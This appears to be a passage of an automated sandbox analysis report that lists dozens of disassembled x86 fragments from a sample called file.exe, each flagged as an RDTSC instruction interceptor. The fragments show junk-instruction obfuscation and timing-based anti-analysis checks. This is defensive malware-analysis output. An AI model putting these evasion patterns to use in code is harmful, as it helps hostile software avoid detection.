                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07474 second address: A0748E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17D23 second address: A17D41 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1B74BBC1C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jo 00007F1B74BBC1C6h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 jbe 00007F1B74BBC1D8h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17D41 second address: A17D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17D45 second address: A17D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24BBB second address: A24BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24BBF second address: A24BD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jl 00007F1B74BBC1C6h 0x0000000d pop esi 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F1B74BBC1C6h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24BD7 second address: A24C0B instructions: 0x00000000 rdtsc 0x00000002 js 00007F1B751F19D6h 0x00000008 jne 00007F1B751F19D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jp 00007F1B751F19D6h 0x00000017 jmp 00007F1B751F19E9h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24D55 second address: A24D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24ED5 second address: A24EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24EDB second address: A24EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1B74BBC1C6h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24EE9 second address: A24EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24EEF second address: A24EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24EF9 second address: A24F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1B751F19D6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F1B751F19E3h 0x00000016 popad 0x00000017 jbe 00007F1B751F19E2h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2521D second address: A25222 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2537B second address: A25381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25381 second address: A2538D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2538D second address: A25391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25391 second address: A2539D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2539D second address: A253A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A253A1 second address: A253AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A253AB second address: A253B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25507 second address: A25515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007F1B74BBC1C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A257B3 second address: A257D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1B751F19D6h 0x0000000a jnp 00007F1B751F19D6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1B751F19DCh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A257D2 second address: A257D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A257D6 second address: A257DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25FF4 second address: A25FFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26172 second address: A2617A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6084 second address: 9F6090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F1B74BBC1C6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E153 second address: A2E158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E280 second address: A2E286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D25F second address: A2D26E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F1B751F19D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E516 second address: A2E522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F2C07 second address: 9F2C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B751F19E9h 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F1B751F19D6h 0x00000011 popad 0x00000012 jne 00007F1B751F19E2h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A312EE second address: A312F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34B63 second address: A34B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F1B751F19D6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34B6D second address: A34BB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 jmp 00007F1B74BBC1D5h 0x00000015 jp 00007F1B74BBC1CCh 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push esi 0x00000022 pop esi 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34BB2 second address: A34BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B751F19DFh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34BC5 second address: A34BD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34BD6 second address: A34BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34EA7 second address: A34EC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1B74BBC1CDh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A350D6 second address: A350EB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1B751F19D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F1B751F19D8h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A350EB second address: A35103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B74BBC1D4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35778 second address: A3577C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3577C second address: A3579C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1B74BBC1CFh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jl 00007F1B74BBC1CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35856 second address: A3585B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35964 second address: A3596D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35BAB second address: A35BAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35BAF second address: A35BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35D86 second address: A35DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 nop 0x00000007 mov di, dx 0x0000000a xchg eax, ebx 0x0000000b js 00007F1B751F19DAh 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 push eax 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jp 00007F1B751F19D6h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37B57 second address: A37B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F95AE second address: 9F95C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jne 00007F1B751F19D6h 0x0000000c popad 0x0000000d jc 00007F1B751F19D8h 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F95C7 second address: 9F95CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F95CB second address: 9F95E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F1B751F19DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F1B751F19D6h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F95E8 second address: 9F95FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F95FD second address: 9F961B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E9h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A392A9 second address: A392AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39C91 second address: A39C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39C95 second address: A39C9F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1B74BBC1C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39C9F second address: A39CC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1B751F19E4h 0x00000008 jo 00007F1B751F19D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39CC6 second address: A39CDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39CDA second address: A39D8D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1B751F19ECh 0x00000008 jmp 00007F1B751F19E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F1B751F19D8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov edi, ecx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F1B751F19D8h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 js 00007F1B751F19DCh 0x0000004e sub dword ptr [ebp+122D316Bh], edi 0x00000054 push ecx 0x00000055 jne 00007F1B751F19DCh 0x0000005b pop esi 0x0000005c push 00000000h 0x0000005e mov edi, dword ptr [ebp+122D375Ch] 0x00000064 xchg eax, ebx 0x00000065 pushad 0x00000066 jmp 00007F1B751F19E1h 0x0000006b jbe 00007F1B751F19D8h 0x00000071 popad 0x00000072 push eax 0x00000073 je 00007F1B751F19E0h 0x00000079 push eax 0x0000007a push edx 0x0000007b push ebx 0x0000007c pop ebx 0x0000007d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B797 second address: A3B79B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B79B second address: A3B7AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B7AA second address: A3B7BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B74BBC1CBh 0x00000009 jbe 00007F1B74BBC1C6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B7BF second address: A3B7C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B7C9 second address: A3B7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BE2E second address: A3BE38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F1B751F19D6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BE38 second address: A3BEDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F1B74BBC1D6h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F1B74BBC1C8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c and esi, dword ptr [ebp+122D3998h] 0x00000032 push 00000000h 0x00000034 mov esi, dword ptr [ebp+122D344Ah] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F1B74BBC1C8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 mov di, A9F1h 0x0000005a xchg eax, ebx 0x0000005b push eax 0x0000005c jmp 00007F1B74BBC1D0h 0x00000061 pop eax 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BEDE second address: A3BEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C69F second address: A3C6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C6A3 second address: A3C6BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D46A second address: A3D46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3DEE0 second address: A3DEF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3DCC5 second address: A3DCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3DEF8 second address: A3DF52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F1B751F19D8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 push 00000000h 0x00000023 xor dword ptr [ebp+122D36DFh], ebx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F1B751F19D8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov esi, ebx 0x00000047 push eax 0x00000048 jng 00007F1B751F19F7h 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E76F second address: A3E773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E773 second address: A3E779 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A42EDC second address: A42EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43E9D second address: A43EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jng 00007F1B751F19D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46FDF second address: A47085 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1B74BBC1D4h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d jbe 00007F1B74BBC1C8h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F1B74BBC1C8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 jmp 00007F1B74BBC1D4h 0x00000036 xor dword ptr [ebp+1247084Eh], esi 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007F1B74BBC1C8h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 mov ebx, dword ptr [ebp+122D2E8Eh] 0x0000005e push 00000000h 0x00000060 push edx 0x00000061 jnc 00007F1B74BBC1CCh 0x00000067 pop ebx 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jbe 00007F1B74BBC1C8h 0x00000071 pushad 0x00000072 popad 0x00000073 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46059 second address: A4607A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48FDF second address: A48FE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48FE5 second address: A49000 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
